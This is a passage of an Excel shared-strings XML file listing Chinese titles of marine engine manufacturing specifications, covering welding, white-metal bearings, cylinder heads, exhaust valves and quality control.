        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接和质量说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接顺序图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接顺序以及板编号</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接顺序</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接钢管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接检验图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接材料</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊脖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接套筒</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>白合金</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>白合金层</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>白合金层材质规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>白合金层</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特种白合金</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>白合金层</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特种白合金</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蝶形螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢丝绳</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不锈钢丝网</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导线轨</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带钩钢丝绳</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带卸扣的钢丝绳</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接线图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>布线图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>共轨单元接线</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拔销装置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>木箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架工作踏板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工作台</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函工作台</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扭矩扳手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轭</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>规范文件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>所有机型</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锻件十字头质量规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电焊焊材规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴质量规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体扫气箱预装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞安装及对中规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体安装规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖及排气阀安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆磨削</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接方法</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀杆维修</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>球墨铸铁主轴承盖质量规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>白合金轴瓦质量规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压管焊接规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊缝检查</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀焊接说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀质量规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀杆</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>HVOF</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涂层</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖首次制造认可</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖质量规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机部件标记规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴链条质量规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电气部件首次制造质量规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铸锻件矫正质量规范</t>
    </r>
  </si>
  <si>
    <r>
      <t>HFC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷涂</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铝合金轴承质量控制</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖堆焊质量规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖焊接说明</t>
    </r>
  </si>
  <si>
    <r>
      <t>TSB</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涂层质量规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆补焊修复工艺</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架防爆门质量规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧固件安装要求</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锻造缸盖质量控制</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>手持式硬度仪校核</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接收缩量说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承座返修说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机安装密封规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧配螺栓缺陷验收标准</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电子式注油器质量控制</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链轮磨合规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电气设备防护规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助风机质量控制</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴表面返修规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>氯化物清洗规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油器质量控制</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>水雾截留器生产规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴臂距差</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架质量控制</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压燃油管质量控制</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆质量控制</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊后热处理规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部件去毛刺及清理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油清洁度规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压燃油管接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涂层样本检验准备</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接变形</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘车机质量控制</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链轮安装检查</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部件检验指导</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测量规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不锈钢焊接指导</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>往复运动部件检验</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>疲劳试验质量控制</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊具质量控制</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴瓦检验指导</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>储存指导</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>表面粗糙度质量控制</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器指导</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链条安装指导</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>红套指导</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电气部件安装指南</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>耐热</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>O</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型圈质量控制</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>备件存放规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>球墨铸铁缸体质量规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体质量控制</t>
    </r>
  </si>
  <si>
    <r>
      <t>EGR</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>指导</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺栓上紧检查</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接追溯表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管路颜色标记</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管子制造指导</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>深孔钻孔指导</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接缺陷</t>
    </r>
  </si>
  <si>
    <r>
      <t>ROTCOMP</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减震器安装指导</t>
    </r>
  </si>
  <si>
    <r>
      <t>O</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型圈生产储存发运指导</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>SCR</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>质量控制</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>镀铬孔珩磨</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平台详图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴瓦无损探伤</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵机构安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴承工艺</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆质量控制</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
